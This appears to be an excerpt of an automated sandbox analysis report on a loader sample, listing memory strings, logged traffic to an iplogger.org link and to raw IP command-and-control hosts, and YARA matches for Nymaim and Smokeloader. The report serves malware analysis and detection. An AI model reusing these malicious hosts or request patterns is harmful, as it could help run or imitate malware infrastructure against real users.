                  Source: Cleaner.exe, 00000016.00000003.434593062.000001CFE1B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.T
                  Source: Cleaner.exe, 00000016.00000003.434380388.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434233291.000001CFE1B29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.TTC
                  Source: Cleaner.exe, 00000016.00000003.434005148.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/F
                  Source: Cleaner.exe, 00000016.00000003.434005148.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0ho
                  Source: Cleaner.exe, 00000016.00000003.434005148.000001CFE1B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ho
                  Source: Cleaner.exe, 00000016.00000003.434380388.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.434233291.000001CFE1B29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/ho
                  Source: Cleaner.exe, 00000016.00000003.444449589.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.444320811.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.monotype.9
                  Source: Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428357477.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428374052.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428388847.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com-
                  Source: Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comcom
                  Source: Cleaner.exe, 00000016.00000003.428357477.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.428374052.000001CFE1B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comd:
                  Source: Cleaner.exe, 00000016.00000003.428279324.000001CFE1B22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.como2
                  Source: Cleaner.exe, 00000016.00000003.428388847.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comtr
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Cleaner.exe, 00000016.00000003.435071712.000001CFE1B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comI
                  Source: Cleaner.exe, 00000016.00000003.430026733.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Cleaner.exe, 00000016.00000003.431705459.000001CFE1B20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comq
                  Source: Cleaner.exe, 00000016.00000003.429063853.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.typography.net
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Cleaner.exe, 00000016.00000003.429063853.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netad
                  Source: Cleaner.exe, 00000016.00000003.436737283.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.436633622.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.436859788.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437363653.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437170500.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437117752.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437064705.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.436930103.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000003.437229886.000001CFE1B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
                  Source: Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Cleaner.exe, 00000016.00000003.432353861.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.568193872.000001CFE2DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Cleaner.exe, 00000016.00000003.432353861.000001CFE1B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn.TTF
                  Source: file.exe, 00000000.00000003.396800531.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.364648566.00000000031C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.390225598.0000000003712000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.393566637.000000000371E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395142031.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392148582.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.389580944.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.398066889.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.394103173.0000000003913000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392869347.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397700050.0000000003934000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.396385601.0000000003924000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395883295.000000000371B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397228041.0000000003718000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.399409682.0000000003716000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.365552738.0000000003080000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
                  Source: Cleaner.exe, 00000016.00000002.565355076.000001CFC95BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org
                  Source: file.exe, 00000000.00000003.396800531.0000000003B36000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.364648566.00000000031C8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.390225598.0000000003712000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.393566637.000000000371E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395142031.0000000003B1B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392148582.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.389580944.0000000003AC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.398066889.0000000003B63000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.394103173.0000000003913000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.392869347.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397700050.0000000003934000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.396385601.0000000003924000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.395883295.000000000371B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.397228041.0000000003718000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.399409682.0000000003716000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.365552738.0000000003080000.00000004.00000800.00020000.00000000.sdmp, Cleaner.exe, 00000016.00000002.563291404.000001CFC91C1000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr, Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7
                  Source: Cleaner.exe, 00000016.00000002.565404043.000001CFC95CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.orgx
                  Source: Cleaner.exe, 00000016.00000002.563291404.000001CFC91C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
                  Source: unknownDNS traffic detected: queries for: iplogger.org
                  Source: global trafficHTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: DHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: EHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
                  Source: unknownHTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.5:49701 version: TLS 1.2

                  E-Banking Fraud

                  barindex
                  Yara detected Nymaim
                  Source: Yara matchFile source: 0.0.file.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.20.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.26.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.23.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.14.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.20.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.28.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.32.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.26.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.24.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.25.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.18.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.24.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.22.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.30.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.17.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.31.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.28.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.19.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.18.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.16.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.32.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.30.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.16.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.22.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.29.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.21.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.2200000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.27.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.21c0e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.2200000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.313758394.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.314053861.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.340099417.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.303166143.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.308578404.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.318572521.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.352139791.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.308973675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.339625229.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.337565462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.319567616.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.313553571.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.346627601.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.301103570.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.338909457.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.319176574.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.352775062.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.324752364.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.324022607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.352494062.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.345502074.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.346406888.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.313405136.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.308781752.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.318868933.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.345921160.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.324526447.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.302389344.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.351860425.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000000.302874171.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.314053861.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000000.340099417.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
